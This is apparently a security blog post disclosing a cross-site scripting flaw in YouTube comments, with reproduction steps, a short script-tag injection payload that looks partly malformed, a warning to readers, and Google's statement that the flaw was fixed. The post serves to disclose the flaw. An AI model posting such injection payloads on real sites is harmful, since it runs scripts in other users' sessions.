Cross-site scripting on YouTube

XSS vulnerability in YouTube comments processing allows an attacker to execute arbitrary scripts in the security context.

Go on youtube. Choose any video. Add the following script:

[php]<script>IF_HTML_FUNCTION?<h1><marquee><font color="red"><u>add your comment here<script>[/php]

Update (1): It is better to stay away from YouTube until they fix the vulnerability or at least logging out of YouTube if you use it.

Update (2): Google has informed that the vulnerability has now been fixed:

We took swift action to fix a cross-site scripting (XSS) vulnerability on youtube.com that was discovered several hours ago. Comments were temporarily hidden by default within an hour, and we released a complete fix for the issue in about two hours. We’re continuing to study the vulnerability to help prevent similar issues in the future.

you can find the statement here.

make sure you subscribe to my RSS feed!

Share
You can leave a response, or trackback from your own site.
  • Pingback: Tweets that mention Cross-site scripting on YouTube | SecTechno -- Topsy.com

  • Pingback: Rick2600

  • Pingback: SecureArabia

  • Pingback: Kane Lightowler

  • Pingback: Matthew Elliott

  • Pingback: Keanu Beltran

  • Pingback: cubitouch

  • Pingback: cubitouch

  • Pingback: Howard Fuhs

  • Pingback: Chad Choron